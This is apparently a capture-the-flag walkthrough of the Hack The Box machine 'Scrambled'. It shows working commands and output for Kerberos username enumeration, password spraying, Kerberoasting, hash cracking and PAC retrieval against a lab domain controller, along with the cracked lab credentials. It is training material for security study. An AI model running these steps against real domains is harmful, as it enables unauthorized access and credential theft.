# HTB - Scrambled

<figure><img src="https://2418983862-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLGWbtqRCldHo6WEY0xxg%2Fuploads%2FEdVJ2Mg3I3yPEo8tORj6%2FScrambled.png?alt=media&#x26;token=438ad661-cd72-4fee-ba8c-56e4aa6bb4dc" alt=""><figcaption></figcaption></figure>

## General Information

* **Machine Name:** Scrambled
* **Machine IP:** 10.129.85.148
* **Operating System:** Windows
* **Difficulty:** Medium
* **Release Date:** 11 Jun 2022

***

## Enumeration

### Ping to obtain the return route

We ping the target machine to verify connectivity and to learn about the path taken, using the `-R` (record route) option to include the return route:

{% code title="Kali Linux Machine" %}

```bash
ping -c 1 10.129.85.148 -R
```

{% endcode %}

<div align="left"><figure><img src="https://2418983862-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLGWbtqRCldHo6WEY0xxg%2Fuploads%2FvqHvVNB7MaWvSJlWPXcd%2Fimage.png?alt=media&#x26;token=a42af0be-f54e-410e-92c3-fcba141e39fd" alt=""><figcaption></figcaption></figure></div>

A TTL (Time To Live) value of 127 suggests that the target's operating system is Windows. The TTL is a field in the IP header that limits how long a packet may remain on the network before being discarded; in practice every router it crosses decrements it by one. <mark style="color:yellow;">**Windows sets the TTL of its IP packets to 128 by default**</mark>, which becomes 127 after one hop on the network.

### Port scan with Nmap

Next, we run a port scan with Nmap to identify the open ports on the target. We use `-p-` to scan all 65535 ports, `--open` to show only open ports, `-sS` for a TCP SYN scan, `--min-rate 5000` to set the minimum packet rate and `-vvv` for high verbosity. We also use `-n` to disable DNS resolution, `-Pn` to skip host discovery (ping), and `-oG allPorts` to save the output in greppable format <mark style="color:yellow;">so that we can then use our extractPorts function</mark>:

{% code title="Kali Linux Machine" overflow="wrap" %}

```bash
sudo nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.129.85.148 -oG allPorts
extractPorts allPorts
```

{% endcode %}
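The `extractPorts` function used above is a community shell helper that greps the IP and the open ports out of the greppable file (and copies them to the clipboard). As an added example, not part of the original writeup, here is a Python equivalent that parses `-oG` output and renders the port list in the form `nmap -p` expects. `SAMPLE_GNMAP` is a constructed, shortened sample modelled on the scan above, and the names `extract_ports` and `ports_arg` are chosen here:

```python
import re
from typing import Dict, List

# Constructed sample of nmap -oG (greppable) output, modelled on the scan above.
# The real allPorts file has one "Ports:" line for 10.129.85.148 with 22 ports;
# the list here is shortened for the demo.
SAMPLE_GNMAP = """\
# Nmap 7.94SVN scan initiated Tue Apr  2 18:10:03 2024 as: nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn -oG allPorts 10.129.85.148
Host: 10.129.85.148 ()\tStatus: Up
Host: 10.129.85.148 ()\tPorts: 53/open/tcp//domain///, 80/open/tcp//http///, 88/open/tcp//kerberos-sec///, 445/open/tcp//microsoft-ds///, 1433/open/tcp//ms-sql-s///, 4411/open/tcp/////\tIgnored State: filtered (65529)
# Nmap done at Tue Apr  2 18:12:40 2024 -- 1 IP address (1 host up) scanned in 157.12 seconds
"""

# One "Host:" line per scanned address; the Ports field ends at the next tab.
_HOST_LINE = re.compile(r"^Host:\s+(\S+)\s+\(.*?\)\s+Ports:\s+(.*?)(?:\t|$)")
# Each entry looks like 80/open/tcp//http///; only open ports are wanted.
_OPEN_PORT = re.compile(r"(\d+)/open/(?:tcp|udp)/")


def extract_ports(gnmap_text: str) -> Dict[str, List[int]]:
    """Map each host in nmap -oG output to its sorted, de-duplicated open ports."""
    found: Dict[str, set] = {}
    for line in gnmap_text.splitlines():
        if line.startswith("#"):
            continue                       # banner / footer comments
        match = _HOST_LINE.match(line)
        if not match:
            continue                       # e.g. "Status: Up" lines carry no ports
        host, ports_field = match.group(1), match.group(2)
        for port in _OPEN_PORT.findall(ports_field):
            found.setdefault(host, set()).add(int(port))
    return {host: sorted(ports) for host, ports in found.items()}


def ports_arg(ports: List[int]) -> str:
    """Render a port list as the comma-separated value that nmap -p expects."""
    return ",".join(str(p) for p in ports)


if __name__ == "__main__":
    for host, ports in extract_ports(SAMPLE_GNMAP).items():
        print(f"[*] IP: {host}")
        print(f"[*] Open ports: {ports_arg(ports)}")
```

Because only `/open/` entries are matched, the same parser works on a file produced without `--open`, where closed and filtered ports also appear in the `Ports:` field.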

<figure><img src="https://2418983862-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLGWbtqRCldHo6WEY0xxg%2Fuploads%2FdGDvFVUpI5Po4qIy9AZw%2Fimage.png?alt=media&#x26;token=6bc4c054-8b31-4345-84c3-5f3f533efd35" alt=""><figcaption></figcaption></figure>

### Detailed scan with Nmap

Next, we run a more detailed scan of the ports just identified, using `-sCV` for version detection plus the default service-enumeration scripts. We pass the ports with `-p PORTS` (replacing `PORTS` with the comma-separated list from the previous step) and save the output to a plain-text file named `targeted`:

{% code title="Kali Linux Machine" %}

```bash
sudo nmap -sCV -p PORTS 10.129.85.148 -oN targeted
```

{% endcode %}

```
# Nmap 7.94SVN scan initiated Tue Apr  2 18:15:21 2024 as: nmap -p53,80,88,135,139,389,445,464,593,636,1433,3268,3269,4411,5985,9389,49667,49673,49674,49699,49704,60649 -sCV -oN targeted 10.129.85.148
Nmap scan report for 10.129.85.148
Host is up (0.20s latency).

Bug in ms-sql-ntlm-info: no string output.
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Scramble Corp Intranet
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-04-02 22:15:30Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2024-04-02T22:18:47+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2022-06-09T01:42:36
|_Not valid after:  2023-06-09T01:42:36
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2024-04-02T22:18:46+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2022-06-09T01:42:36
|_Not valid after:  2023-06-09T01:42:36
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info: 
|   10.129.85.148:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
|_ssl-date: 2024-04-02T22:18:47+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-04-02T21:44:08
|_Not valid after:  2054-04-02T21:44:08
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2022-06-09T01:42:36
|_Not valid after:  2023-06-09T01:42:36
|_ssl-date: 2024-04-02T22:18:47+00:00; +1s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2024-04-02T22:18:46+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2022-06-09T01:42:36
|_Not valid after:  2023-06-09T01:42:36
4411/tcp  open  found?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, NCP, NULL, NotesRPC, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns: 
|     SCRAMBLECORP_ORDERS_V1.0.3;
|   FourOhFourRequest, GetRequest, HTTPOptions, Help, LPDString, RTSPRequest, SIPOptions: 
|     SCRAMBLECORP_ORDERS_V1.0.3;
|_    ERROR_UNKNOWN_COMMAND;
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49699/tcp open  msrpc         Microsoft Windows RPC
49704/tcp open  msrpc         Microsoft Windows RPC
60649/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4411-TCP:V=7.94SVN%I=7%D=4/2%Time=660C8380%P=x86_64-pc-linux-gnu%r(
SF:NULL,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(GenericLines,1D,"SCRAMBL
SF:ECORP_ORDERS_V1\.0\.3;\r\n")%r(GetRequest,35,"SCRAMBLECORP_ORDERS_V1\.0
SF:\.3;\r\nERROR_UNKNOWN_COMMAND;\r\n")%r(HTTPOptions,35,"SCRAMBLECORP_ORD
SF:ERS_V1\.0\.3;\r\nERROR_UNKNOWN_COMMAND;\r\n")%r(RTSPRequest,35,"SCRAMBL
SF:ECORP_ORDERS_V1\.0\.3;\r\nERROR_UNKNOWN_COMMAND;\r\n")%r(RPCCheck,1D,"S
SF:CRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(DNSVersionBindReqTCP,1D,"SCRAMBLEC
SF:ORP_ORDERS_V1\.0\.3;\r\n")%r(DNSStatusRequestTCP,1D,"SCRAMBLECORP_ORDER
SF:S_V1\.0\.3;\r\n")%r(Help,35,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\nERROR_UNK
SF:NOWN_COMMAND;\r\n")%r(SSLSessionReq,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r
SF:\n")%r(TerminalServerCookie,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(T
SF:LSSessionReq,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(Kerberos,1D,"SCR
SF:AMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(SMBProgNeg,1D,"SCRAMBLECORP_ORDERS_V
SF:1\.0\.3;\r\n")%r(X11Probe,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(Fou
SF:rOhFourRequest,35,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\nERROR_UNKNOWN_COMMA
SF:ND;\r\n")%r(LPDString,35,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\nERROR_UNKNOW
SF:N_COMMAND;\r\n")%r(LDAPSearchReq,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n"
SF:)%r(LDAPBindReq,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(SIPOptions,35
SF:,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\nERROR_UNKNOWN_COMMAND;\r\n")%r(LANDe
SF:sk-RC,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(TerminalServer,1D,"SCRA
SF:MBLECORP_ORDERS_V1\.0\.3;\r\n")%r(NCP,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;
SF:\r\n")%r(NotesRPC,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(JavaRMI,1D,
SF:"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(WMSRequest,1D,"SCRAMBLECORP_ORDE
SF:RS_V1\.0\.3;\r\n")%r(oracle-tns,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")
SF:%r(ms-sql-s,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(afp,1D,"SCRAMBLEC
SF:ORP_ORDERS_V1\.0\.3;\r\n")%r(giop,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n
SF:");
Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-04-02T22:18:08
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Apr  2 18:18:50 2024 -- 1 IP address (1 host up) scanned in 208.81 seconds

```

### Editing /etc/hosts

To add the entry `10.129.85.148 DC1.scrm.local scrm.local` to the `/etc/hosts` file, you can use the following command in the terminal:

{% code title="Kali Linux Machine" overflow="wrap" %}

```bash
echo "10.129.85.148 DC1.scrm.local scrm.local" | sudo tee -a /etc/hosts
```

{% endcode %}

### Username Bruteforce with Kerbrute

{% code title="Kali Linux Machine" overflow="wrap" %}

```bash
kerbrute userenum --dc dc1.scrm.local -d scrm.local -t 2000 /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -o users
```

{% endcode %}

<figure><img src="https://2418983862-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLGWbtqRCldHo6WEY0xxg%2Fuploads%2F9RF2asiZbOzMyqgTfDjZ%2Fimage.png?alt=media&#x26;token=f8bd8c42-5317-46ca-9ff2-ac7a781c4242" alt=""><figcaption></figcaption></figure>

### Directory Bruteforce with Dirsearch

{% code title="Kali Linux Machine" %}

```bash
dirsearch -u scrm.local
```

{% endcode %}

<figure><img src="https://2418983862-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLGWbtqRCldHo6WEY0xxg%2Fuploads%2Fc2CRoNFDICXGQeFORsUm%2Fimage.png?alt=media&#x26;token=9cd9c297-5075-41c6-b2a3-c4913a109409" alt=""><figcaption></figcaption></figure>

### Analyzing the scrm.local page

<figure><img src="https://2418983862-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLGWbtqRCldHo6WEY0xxg%2Fuploads%2Ftg70r1wpeJH2n7Pbui6P%2Fimage.png?alt=media&#x26;token=ee8c1001-7f33-4a36-8766-654d1bd6da03" alt=""><figcaption></figcaption></figure>

```
http://scrm.local/supportrequest.html
http://scrm.local/newuser.html
http://scrm.local/salesorders.html
http://scrm.local/passwords.html
```

<figure><img src="https://2418983862-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLGWbtqRCldHo6WEY0xxg%2Fuploads%2F5bCCtJL51qkKFlX4e5Oa%2Fimage.png?alt=media&#x26;token=8dacf30d-80dc-4b23-a07b-aa01e6c6bfd7" alt=""><figcaption></figcaption></figure>

On passwords.html we can read that the password is set to be the same as the username. So I'll try kerbrute again to see whether the credential I obtained works.

### Password Bruteforce with Kerbrute

{% code title="Kali Linux Machine" %}

```bash
kerbrute passwordspray -d scrm.local --dc dc1.scrm.local users ksimpson
```

{% endcode %}

<figure><img src="https://2418983862-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLGWbtqRCldHo6WEY0xxg%2Fuploads%2FfsZAbB2BD3fPq1tPLfTA%2Fimage.png?alt=media&#x26;token=97fd848c-6d05-44c6-a2f4-df146d8a6bd1" alt=""><figcaption></figcaption></figure>

### Impacket

We now have a valid user, so we continue the enumeration with Impacket.

{% embed url="https://github.com/fortra/impacket" %}

<figure><img src="https://2418983862-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLGWbtqRCldHo6WEY0xxg%2Fuploads%2FmhfQ87WNwgKMn9IndJVb%2Fimage.png?alt=media&#x26;token=58851f9f-c906-4bdd-998e-dee2a17aec53" alt=""><figcaption></figcaption></figure>

We start with `getTGT.py`:

{% code title="Kali Linux Machine" %}

```bash
python3 getTGT.py scrm.local/ksimpson:ksimpson
```

{% endcode %}

<div align="left"><figure><img src="https://2418983862-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLGWbtqRCldHo6WEY0xxg%2Fuploads%2F8gmrI2wTzEHi2FlDpWSz%2Fimage.png?alt=media&#x26;token=6e68d80a-bd12-47ae-a83e-2d9ffb989c5f" alt=""><figcaption></figcaption></figure></div>

```bash
export KRB5CCNAME=ksimpson.ccache
klist
```

<figure><img src="https://2418983862-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLGWbtqRCldHo6WEY0xxg%2Fuploads%2FW1hOPW71F5RtShI2dU0c%2Fimage.png?alt=media&#x26;token=24e7eaca-ca79-4fa7-9776-bf570580f28b" alt=""><figcaption></figcaption></figure>

{% hint style="info" %}
If `klist` does not work, install the Kerberos client utilities:

```bash
sudo apt-get install krb5-user
```
{% endhint %}

Next we use `GetUserSPNs.py`:

{% code title="Kali Linux Machine" overflow="wrap" %}

```bash
python3 GetUserSPNs.py scrm.local/ksimpson:ksimpson -dc-host dc1.scrm.local -k -no-pass
```

{% endcode %}

<figure><img src="https://2418983862-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLGWbtqRCldHo6WEY0xxg%2Fuploads%2FHfpJUdi02Jmn2E7GSS3H%2Fimage.png?alt=media&#x26;token=af671f26-8109-4f37-a182-04bb7366da69" alt=""><figcaption></figcaption></figure>

{% code title="Kali Linux Machine" overflow="wrap" %}

```bash
python3 GetUserSPNs.py scrm.local/ksimpson:ksimpson -dc-host dc1.scrm.local -k -no-pass -request
```

{% endcode %}

{% code title="hash.txt" overflow="wrap" %}

```
$krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$05ba11933eb6ee366b244a4aa5faeb53$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
```

{% endcode %}

### John the Ripper to crack the hash

{% code title="Kali Linux Machine" overflow="wrap" %}

```bash
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
```

{% endcode %}

<figure><img src="https://2418983862-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLGWbtqRCldHo6WEY0xxg%2Fuploads%2FjZlgdoNc20Lp6shtG3Zv%2Fimage.png?alt=media&#x26;token=7280e147-040e-40e0-bfe1-bd435244ba7c" alt=""><figcaption></figcaption></figure>

{% code title="\~/Scrambled/creds.txt" overflow="wrap" %}

```
ksimpson:ksimpson
sqlsvc:Pegasus60:MSSQLSvc/dc1.scrm.local
```

{% endcode %}

{% code title="Kali Linux Machine" overflow="wrap" %}

```bash
python3 mssqlclient.py dc1.scrm.local -k
```

{% endcode %}

<div align="left"><figure><img src="https://2418983862-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLGWbtqRCldHo6WEY0xxg%2Fuploads%2Ffd0hsfbAI6YugAJM1DDP%2Fimage.png?alt=media&#x26;token=75b08883-0f43-4290-9e53-948eb04a9893" alt=""><figcaption></figcaption></figure></div>

So we try everything again (from `getTGT.py` onwards), this time with the credentials `sqlsvc:Pegasus60`.

{% code title="Kali Linux Machine" %}

```bash
python3 getTGT.py scrm.local/sqlsvc:Pegasus60
export KRB5CCNAME=sqlsvc.ccache
klist
python3 mssqlclient.py dc1.scrm.local -k
```

{% endcode %}

<div align="left"><figure><img src="https://2418983862-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLGWbtqRCldHo6WEY0xxg%2Fuploads%2F8aDYMmeiDxMToFczyAWW%2Fimage.png?alt=media&#x26;token=c90f3542-7a48-4b27-9682-420695a8110f" alt=""><figcaption></figcaption></figure></div>

### NTLM Hash

We convert "Pegasus60" to an NTLM hash with an online tool (browserling.com/tools/ntlm-hash). On a real engagement, compute this locally instead of pasting a live credential into a third-party site.

```
Pegasus60:b999a16500b87d17ec7f2e2a68778f05
```

And we add it to our credential list in creds.txt:

<figure><img src="https://2418983862-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLGWbtqRCldHo6WEY0xxg%2Fuploads%2Famqob40CPW0FZ0uWFFf9%2Fimage.png?alt=media&#x26;token=690ef3ee-58fe-49d9-add4-0e878fbb7c0b" alt=""><figcaption></figcaption></figure>

### getPac.py

{% code title="Kali Linux Machine" overflow="wrap" %}

```bash
python3 getPac.py -targetUser Administrator scrm.local/ksimpson:ksimpson
```

{% endcode %}

<pre data-title="getPac.py output"><code>Impacket v0.11.0 - Copyright 2023 Fortra

KERB_VALIDATION_INFO 
LogonTime:                      
    dwLowDateTime:                   3436097167 
    dwHighDateTime:                  31098182 
LogoffTime:                     
    dwLowDateTime:                   4294967295 
    dwHighDateTime:                  2147483647 
KickOffTime:                    
    dwLowDateTime:                   4294967295 
    dwHighDateTime:                  2147483647 
PasswordLastSet:                
    dwLowDateTime:                   2585823167 
    dwHighDateTime:                  30921784 
PasswordCanChange:              
    dwLowDateTime:                   3297396671 
    dwHighDateTime:                  30921985 
PasswordMustChange:             
    dwLowDateTime:                   4294967295 
    dwHighDateTime:                  2147483647 
EffectiveName:                   'administrator' 
FullName:                        '' 
LogonScript:                     '' 
ProfilePath:                     '' 
HomeDirectory:                   '' 
HomeDirectoryDrive:              '' 
LogonCount:                      259 
BadPasswordCount:                0 
<a data-footnote-ref href="#user-content-fn-1">UserId:                          500 </a>
PrimaryGroupId:                  513 
GroupCount:                      5 
GroupIds:                       
    [
         
        RelativeId:                      513 
        Attributes:                      7 ,
         
        RelativeId:                      512 
        Attributes:                      7 ,
         
        RelativeId:                      520 
        Attributes:                      7 ,
         
        RelativeId:                      518 
        Attributes:                      7 ,
         
        RelativeId:                      519 
        Attributes:                      7 ,
    ] 
UserFlags:                       544 
UserSessionKey:                 
    Data:                            b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' 
LogonServer:                     'DC1' 
LogonDomainName:                 'SCRM' 
LogonDomainId:                  
    Revision:                        1 
    SubAuthorityCount:               4 
    IdentifierAuthority:             b'\x00\x00\x00\x00\x00\x05' 
    SubAuthority:                   
        [
             21,
             2743207045,
             1827831105,
             2542523200,
        ] 
LMKey:                           b'\x00\x00\x00\x00\x00\x00\x00\x00' 
UserAccountControl:              16912 
SubAuthStatus:                   0 
LastSuccessfulILogon:           
    dwLowDateTime:                   0 
    dwHighDateTime:                  0 
LastFailedILogon:               
    dwLowDateTime:                   0 
    dwHighDateTime:                  0 
FailedILogonCount:               0 
Reserved3:                       0 
SidCount:                        1 
ExtraSids:                      
    [
         
        Sid:                            
            Revision:                        1 
            SubAuthorityCount:               1 
            IdentifierAuthority:             b'\x00\x00\x00\x00\x00\x12' 
            SubAuthority:                   
                [
                     2,
                ] 
        Attributes:                      7 ,
    ] 
ResourceGroupDomainSid:         
    Revision:                        1 
    SubAuthorityCount:               4 
    IdentifierAuthority:             b'\x00\x00\x00\x00\x00\x05' 
    SubAuthority:                   
        [
             21,
             2743207045,
             1827831105,
             2542523200,
        ] 
ResourceGroupCount:              1 
ResourceGroupIds:               
    [
         
        RelativeId:                      572 
        Attributes:                      536870919 ,
    ] 
Domain SID: S-1-5-21-2743207045-1827831105-2542523200

 0000   10 00 00 00 ED F9 BD 22  BE 45 B3 80 6A 22 04 A4   .......".E..j"..
</code></pre>

We save the Domain SID to our credential list:

<figure><img src="https://2418983862-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLGWbtqRCldHo6WEY0xxg%2Fuploads%2FsnTLB46F3VGgr8SjXmXK%2Fimage.png?alt=media&#x26;token=b48ebfcd-f9a9-4ccd-84a7-e977b60c5d1d" alt=""><figcaption></figcaption></figure>
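The `getPac.py` output above is a raw dump of the KERB_VALIDATION_INFO structure. As an added example (not from the writeup or from Impacket), the following Python reads the fields that matter when reviewing what a PAC claims about an account: it joins each `dwLowDateTime`/`dwHighDateTime` pair into a FILETIME timestamp, rebuilds SID strings from the `IdentifierAuthority`/`SubAuthority` fields, and labels the well-known RIDs in `GroupIds`. `SAMPLE` holds values copied from the dump above; the function names and the `WELL_KNOWN_RIDS` table are chosen here:

```python
from datetime import datetime, timedelta, timezone

# FILETIME counts 100 ns ticks since 1601-01-01 UTC; 0x7FFFFFFFFFFFFFFF means "never"
_FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
_NEVER = 0x7FFFFFFFFFFFFFFF

# Well-known relative IDs worth recognising when reading a PAC (assumed table, chosen here)
WELL_KNOWN_RIDS = {
    500: "Administrator",
    512: "Domain Admins",
    513: "Domain Users",
    518: "Schema Admins",
    519: "Enterprise Admins",
    520: "Group Policy Creator Owners",
    572: "Denied RODC Password Replication Group",
}


def filetime_to_datetime(low, high):
    """Join dwLowDateTime/dwHighDateTime into a UTC datetime, or None for 'never'."""
    ticks = (high << 32) | low
    if ticks == _NEVER:
        return None
    return _FILETIME_EPOCH + timedelta(microseconds=ticks // 10)


def sid_from_parts(revision, authority, sub_authorities):
    """Build an S-1-... string from the Revision/IdentifierAuthority/SubAuthority fields."""
    auth = int.from_bytes(authority, "big")   # 6-byte big-endian identifier authority
    return "S-" + "-".join(str(x) for x in (revision, auth, *sub_authorities))


def describe_validation_info(info):
    """Summarise the parts of KERB_VALIDATION_INFO that matter for a privilege review."""
    domain_sid = sid_from_parts(*info["LogonDomainId"])
    groups = [(rid, WELL_KNOWN_RIDS.get(rid, "custom/unknown")) for rid in info["GroupIds"]]
    return {
        "user": info["EffectiveName"],
        "user_sid": f"{domain_sid}-{info['UserId']}",
        "domain_sid": domain_sid,
        "logon_time": filetime_to_datetime(*info["LogonTime"]),
        "password_must_change": filetime_to_datetime(*info["PasswordMustChange"]),
        "groups": groups,
        "extra_sids": [sid_from_parts(*s) for s in info["ExtraSids"]],
        "is_domain_admin": 512 in info["GroupIds"],
    }


# Values copied from the getPac.py dump above (page data, reshaped into a dict)
SAMPLE = {
    "EffectiveName": "administrator",
    "UserId": 500,
    "LogonTime": (3436097167, 31098182),
    "PasswordMustChange": (4294967295, 2147483647),
    "LogonDomainId": (1, b"\x00\x00\x00\x00\x00\x05", [21, 2743207045, 1827831105, 2542523200]),
    "GroupIds": [513, 512, 520, 518, 519],
    "ExtraSids": [(1, b"\x00\x00\x00\x00\x00\x12", [2])],
}

if __name__ == "__main__":
    for key, value in describe_validation_info(SAMPLE).items():
        print(f"{key:>21}: {value}")
```

Run on the sample, the summary shows the PAC asserting membership in Domain Admins (512), Enterprise Admins (519), Schema Admins (518) and Group Policy Creator Owners (520), a `PasswordMustChange` of "never", and a logon time of 2024-04-02 UTC (the same day as the scan). The extra SID S-1-18-2 (service asserted identity) is consistent with `getPac.py` obtaining the PAC through S4U2Self rather than an interactive logon. The same SID reconstruction applies to the base64 `objectSid` values decoded in the LDAP section that follows.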

### LDAP Search

{% code title="Kali Linux Machine" overflow="wrap" %}

```bash
ldapsearch -H ldap://dc1.scrm.local -U ksimpson -b 'DC=SCRM,DC=LOCAL'  | grep -i sid
```

{% endcode %}

<div align="left"><figure><img src="https://2418983862-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLGWbtqRCldHo6WEY0xxg%2Fuploads%2FRnQiamfYd9Xz49E9YqVW%2Fimage.png?alt=media&#x26;token=1589c37c-ae06-4b23-b2c6-4f9591e9c2df" alt=""><figcaption></figcaption></figure></div>

### Script: base64 SID to string

{% code title="tosid.py" %}

```python
import base64
import struct
import sys


def decode_sid(raw: bytes) -> str:
    """Convert a binary (packed) SID into its S-1-... string form."""
    revision, sub_count = struct.unpack('BB', raw[0:2])
    assert revision == 1
    # IdentifierAuthority is a 6-byte big-endian integer
    authority = int.from_bytes(raw[2:8], 'big')
    # Each SubAuthority is a 32-bit little-endian integer
    subs = struct.unpack(f'<{sub_count}L', raw[8:8 + 4 * sub_count])
    return 'S-' + '-'.join(str(x) for x in (revision, authority, *subs))


def main():
    if len(sys.argv) < 2:
        sys.exit("Uso: python3 tosid.py base64SID")
    try:
        print(f"SID decodificado: {decode_sid(base64.b64decode(sys.argv[1]))}")
    except Exception as e:
        print(f"Error: {e}")


if __name__ == "__main__":
    main()
```

{% endcode %}

{% code title="Kali Linux Machine" %}

```bash
python3 tosid.py AQUAAAAAAAUVAAAAhQSCo0F98mxA04uXVAYAAA==
```

{% endcode %}

<div align="left"><figure><img src="https://2418983862-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLGWbtqRCldHo6WEY0xxg%2Fuploads%2FZGHvQeJeSUTQUsktmNR2%2Fimage.png?alt=media&#x26;token=a42a2c08-d577-475f-a1b5-3710c2a71775" alt=""><figcaption></figcaption></figure></div>

{% code title="Kali Linux Machine" overflow="wrap" %}

```bash
grep S-1-5-21-2743207045-1827831105-2542523200 creds.txt
```

{% endcode %}

<div align="left"><figure><img src="https://2418983862-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLGWbtqRCldHo6WEY0xxg%2Fuploads%2F39HpK94tpbJKo0ZNg5bt%2Fimage.png?alt=media&#x26;token=2e609724-a10f-4509-911b-7bc4343c07c4" alt=""><figcaption></figcaption></figure></div>

